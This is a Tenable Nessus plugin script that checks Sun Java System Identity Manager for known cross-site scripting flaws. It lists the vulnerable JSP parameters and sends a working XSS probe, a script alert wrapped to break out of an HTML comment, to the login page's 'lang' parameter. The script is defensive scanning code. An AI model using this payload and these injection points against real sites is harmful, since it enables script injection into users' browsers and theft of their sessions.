#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(29926);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2008-0239", "CVE-2008-0240", "CVE-2008-0241");
  script_bugtraq_id(27214);
  script_xref(name:"OSVDB", value:"40748");
  script_xref(name:"OSVDB", value:"40749");
  script_xref(name:"OSVDB", value:"40750");

  script_name(english:"Sun Java System Identity Manager Cross-Site Scripting Vulnerabilities");
  script_summary(english:"Checks for XSS flaws in Identity Manager");

  desc = "
Synopsis :

The remote web server contains an application that is affected by
multiple cross-site scripting vulnerabilities. 

Description :

The remote host is running Sun Java System Identity Manager, a Java
application for user provisioning and identity auditing in enterprise
environments. 

The version of Identity Manager installed on the remote host fails to
sanitize user-supplied input to various JSP scripts before using it to
generate dynamic content.  An unauthenticated remote attacker may be
able to leverage these issues to inject arbitrary HTML or script code
into a user's browser to be executed within the security context of
the affected site. 

Known to be affected are the 'cntry' and 'lang' parameters of the
'login.jsp' script, the 'resultsForm' parameter of the
'account/findForSelect.jsp' script, the 'activeControl' parameter of
the 'user/main.jsp' script, the 'helpUrl' parameter of the
'help/index.jsp' script, and the 'nextPage' parameter of the
'user/login.jsp' script

See also :

http://www.procheckup.com/Vulnerability_PR07-06.php
http://www.procheckup.com/Vulnerability_PR07-07.php
http://www.procheckup.com/Vulnerability_PR07-08.php
http://www.procheckup.com/Vulnerability_PR07-09.php
http://www.procheckup.com/Vulnerability_PR07-10.php
http://www.procheckup.com/Vulnerability_PR07-12.php
http://www.securityfocus.com/archive/1/486076
http://sunsolve.sun.com/search/document.do?assetkey=1-26-103180-1

Solution :

None at this time.

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80, 8080);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:8080);
if (!get_port_state(port)) exit(0);
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);


# A simple alert.
xss = string("<script>alert('", SCRIPT_NAME, "')</script>");
exploit = string("-->", xss, "<!--");


# Loop through directories.
if (thorough_tests) dirs = make_list("/idm", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  req = http_get(
    item:string(
      dir, "/login.jsp?",
      "lang=", exploit, "&",
      "cntry="
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if...
  if (
    # it's Identity Manager and ...
    "Sun Microsystems, Inc" >< res &&
    "title>Identity Manager<" >< res &&
    # the display name uses are exploit
    string("The local display name is: ", exploit, " -->") >< res
  )
  {
    security_warning(port);
    exit(0);
  }
}
